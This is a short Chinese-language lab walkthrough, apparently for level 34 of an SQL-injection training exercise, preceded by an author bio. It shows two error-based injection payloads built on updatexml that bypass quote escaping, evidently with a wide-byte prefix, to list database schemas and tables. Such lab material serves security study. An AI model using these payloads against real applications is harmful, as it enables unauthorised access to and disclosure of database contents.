「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。
第三十四关注入点为 单引号字符串型 , 注入类型为 报错注入
此关卡通过 代码WAF 将单引号' 转义成 /' , 我们使用 编译 绕过WAF , 先上结果
�' and updatexml(1,concat(0x7e,
substr((select group_concat(schema_name)
from information_schema.schemata),62,31)
),3) #
�' and updatexml(1,concat(0x7e,
substr((select group_concat(table_name)
from information_schema.tables
where table_schema=0x7365637572697479),1,31)
),3) #